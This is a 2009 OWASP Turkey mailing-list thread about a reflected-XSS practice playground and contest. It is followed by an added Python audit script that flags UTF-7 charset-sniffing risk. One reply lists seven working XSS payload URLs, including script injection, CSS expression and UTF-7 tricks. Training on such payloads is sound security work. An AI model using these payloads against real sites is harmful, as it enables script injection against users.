[Owasp-turkey] Reflected XSS Playground and Contest

Huzeyfe ONAL huzeyfe at lifeoverip.net
Tue Jun 16 02:30:21 EDT 2009


Greetings,


A few tools I tried with default settings also failed to find some of them.
This is actually an important piece of work in that it shows how effective
automated tools/methods can be.

But how often the XSS cases here occur in today's applications is also very
important. That is, tool authors probably don't want to do a ton of extra
work for something that has a 1% chance of being found.



---
Huzeyfe ONAL
Have you subscribed to the Network Security List?
http://blog.lifeoverip.net/netsec-listesi/

---


2009/6/16 Bedirhan Urgun <bedirhanurgun at gmail.com>

> Thanks, Sertan. Congratulations; your explanations with references are
> especially useful. If you and Cagdas can send me your addresses privately,
> I will send the prizes.
>
> By the way, if you know of an automated tool that finds all of them
> (without false positives), I'm curious. The ones I tried always miss 1-2
> (sometimes even 3).
>
> On Tuesday, 16 June 2009 at 00:23, Sertan Kolat <
> sertan at mlists.olympos.org> wrote:
>
>> Hello,
>>
>>
>> Very nice application, well done.
>>
>>
>> 1) (FF3)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector1=<script>alert(1)</script>a
>>
>> 2) (FF3)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector2="><script>alert(1)</script>a
>>
>> 3) (IE6)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url(javascript:alert(1))
>>
>> or (IE8)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression(alert(1))
>> ;
>>
>> 4) (FF3)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
>>
>> 5) (FF3)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert(1)%3E
>>
>> 6) (IE7, encoding auto-select[1])
>> http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert(1)%2bADw-%2fscript%2bAD4-
>>
>> 7) (IE6)
>> http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url(javascript:alert(1))
>>
>>
>>
>> [1] IE charset encoding Auto-Selection:
>>
>> If 'Encoding' is set to 'Auto-Select', and Internet-Explorer finds a UTF-7
>> string in the first 4096 characters of the response's body, it will set the
>> charset encoding to UTF-7 automatically, unless a certain charset encoding
>> is already enforced.
>>
>>
>>
>> Sertan Kolat
>>
>>
>> On Monday, June 15, 2009, 1:06:17 PM, you wrote:
>>
>> Hello,
>>
>> You can access a "playground" application, where you can learn and
>> practice different Reflected XSS techniques, at
>> http://www.webguvenligi.org/xsstb/reflected.php
>>
>> The application has XSS attack vectors that can be applied to 7 parameters
>> (vector1, vector2, ..., vector7). To the first two people who exploit these
>> vectors and send them as a reply-all to this mail, in the form of the link
>> I give below;
>>
>>
>>
>> to the 1st, a 7-day, 7-night trip to the Maldives for two
>>
>> to the 2nd, a latest-model car
>>
>>
>>
>> Yeah, right!...
>>
>>
>>
>> to the 1st, an OWASP Membership T-Shirt (L)
>>
>> to the 2nd, an OWASP Membership DVD
>>
>>
>>
>> I will send.
>>
>>
>>
>> Example (the first hint is on me):
>>
>>
>> http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E
>>
>>
>>
>> Note 1: displaying 1 in an alert box on screen is enough
>>
>> Note 2: what counts is the order of arrival in the owasp-tr mail archives
>>
>> Note 3: the prizes I listed last are the valid ones! No "oh, I didn't see
>> that" afterwards
>>
>>
>>
>> Project post:
>> http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html
>>
>> --
>>
>> Bedirhan Urgun
>>
>> http://www.webguvenligi.org
>>
>> http://www.owasp.org/index.php/Turkey
>>
>>
>> To subscribe to the Turkish Web Application Security E-Mail List:
>>
>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>>
>
>
>
> --
> Bedirhan Urgun
> http://www.webguvenligi.org
> http://www.owasp.org/index.php/Turkey
>
> To subscribe to the Turkish Web Application Security E-Mail List:
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
>
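
Added example, not part of the original thread and not the playground's own code: footnote [1] in the quoted message says IE auto-selects UTF-7 only when no charset is already enforced, so a response can be audited for exactly that condition. The sample body, header dictionaries and function names are constructed for illustration.

```python
import re

SNIFF_WINDOW = 4096  # per the note above: IE looks at the first 4096 characters of the body

UTF7_RUN = re.compile(rb"\+[A-Za-z0-9+/]{2,}-?")   # '+', modified base64, optional '-'
META_CHARSET = re.compile(rb"<meta[^>]+charset\s*=\s*[\"']?\s*([\w-]+)", re.I)
HEADER_CHARSET = re.compile(r"charset\s*=\s*[\"']?\s*([\w-]+)", re.I)


def declared_charset(headers, body):
    """Charset enforced by the Content-Type header or an early <meta> tag, else None."""
    for name, value in headers.items():
        if name.lower() == "content-type":
            match = HEADER_CHARSET.search(value)
            if match:
                return match.group(1).lower()
    match = META_CHARSET.search(body[:SNIFF_WINDOW])
    return match.group(1).decode("ascii").lower() if match else None


def utf7_markup(body):
    """Decoded UTF-7 runs inside the sniff window that become HTML metacharacters."""
    hits = []
    for run in UTF7_RUN.findall(body[:SNIFF_WINDOW]):
        try:
            decoded = run.decode("utf-7")
        except UnicodeDecodeError:
            continue  # ordinary text containing '+', not valid UTF-7
        if any(ch in decoded for ch in "<>\"'"):
            hits.append(decoded)
    return hits


def audit_response(headers, body):
    """Flag a response that a charset-sniffing browser could reinterpret as UTF-7."""
    charset = declared_charset(headers, body)
    hits = utf7_markup(body)
    at_risk = bool(hits) and charset in (None, "utf-7")
    return {"charset": charset, "utf7_markup": hits, "at_risk": at_risk}


# Constructed sample: a page that reflects the URL-decoded vector6 value unchanged.
REFLECTED = b"<html><body>+ADw-script+AD4-\r\nalert(1)+ADw-/script+AD4-</body></html>"
NO_CHARSET = {"Content-Type": "text/html"}
WITH_CHARSET = {"Content-Type": "text/html; charset=utf-8"}

if __name__ == "__main__":
    print(audit_response(NO_CHARSET, REFLECTED))    # at_risk: True
    print(audit_response(WITH_CHARSET, REFLECTED))  # at_risk: False
```

The second sample shows the mitigation the footnote implies: once the response states its charset explicitly, the same reflected bytes are no longer flagged.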